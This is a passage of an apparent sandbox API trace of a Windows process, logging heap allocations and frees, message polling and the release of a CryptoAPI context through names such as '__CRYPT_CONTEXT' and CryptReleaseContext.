(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0240.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0240.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0240.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0240.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.241] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0240.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0240.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.241] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0240.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0240.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0240.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0240.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0240.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0240.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0240.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0240.245] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0240.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0240.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0240.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.246] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0240.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0240.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0240.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0240.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0240.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0240.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0240.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.248] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0240.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0240.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0240.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.251] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0240.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0240.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.252] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0240.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0240.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0240.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0240.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0240.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0240.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0240.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.256] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0240.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0240.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0240.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.256] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0240.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.257] 